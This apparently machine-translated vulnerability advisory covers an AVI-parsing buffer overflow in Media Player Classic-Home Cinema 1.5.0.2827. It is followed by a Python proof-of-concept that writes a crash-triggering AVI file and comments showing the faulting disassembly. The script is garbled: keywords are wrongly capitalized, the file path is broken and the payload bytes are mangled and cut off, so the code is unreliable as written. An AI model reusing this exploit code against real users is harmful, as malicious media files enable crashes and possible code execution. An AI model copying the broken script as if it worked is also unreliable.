Affected Versions:
Guliverkli Media Player Classic 1.5 2827
Vulnerability description:
Media Player Classic is a popular Media Player.
Media Player Classic does not properly process. avi files. Remote attackers can construct malicious files, trick users into parsing, trigger buffer overflow, and exploit the vulnerability to execute arbitrary code in the application security context.
<* Reference
Http://www.securityfocus.com/bid/47088/
*>
Test method:
#! /Usr/bin/python
# Done by BraniX <branix@hackers.org.pl>
# Www.hackers.org. pl
# Found: 2011.03.29
# Published: 2011.03.29
# Tested on: Windows XP SP3 Home Edition
# App: Media Player Classic-Home Cinema 1.5.0.2827
# App Url: http://mpc-hc.sourceforge.net/download-media-player-classic-hc.html
# Mpc-hc.exe MD5: fef81badedc176bef15bdd5d7ea2b476
# DoS is caused by Access violation exception in module mpc-hc.exe
#00900A06 8B7E 40 mov edi, dword ptr ds: [ESI + 40]
#00900A09 8B0D 3CB89F00 mov ecx, dword ptr ds: [9FB83C]; msdmo.73646976
# 00900A0F 8B15 40B89F00 mov edx, dword ptr ds: [9FB840]
#00900A15 A1 44B89F00 mov eax, dword ptr ds: [9FB844]
# 00900A1A 898C24 34020000 mov dword ptr ss: [ESP + 234], ECX
#00900A21 8B0D 48B89F00 mov ecx, dword ptr ds: [9FB848]
#00900A27 898C24 40020000 mov dword ptr ss: [ESP + 240], ECX
# 00900A2E 899424 38020000 mov dword ptr ss: [ESP + 238], EDX
#00900A35 898424 3C020000 mov dword ptr ss: [ESP + 23C], EAX
# 00900A3C 8B47 10 mov eax, dword ptr ds: [EDI + 10]; EDI = 0
Filepath = "C: \ Media Player Classic-Home Cinema 1.5.0.2827-AVI DoS. avi"
F = open (filepath, "wb ")
Poc = 00 0x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00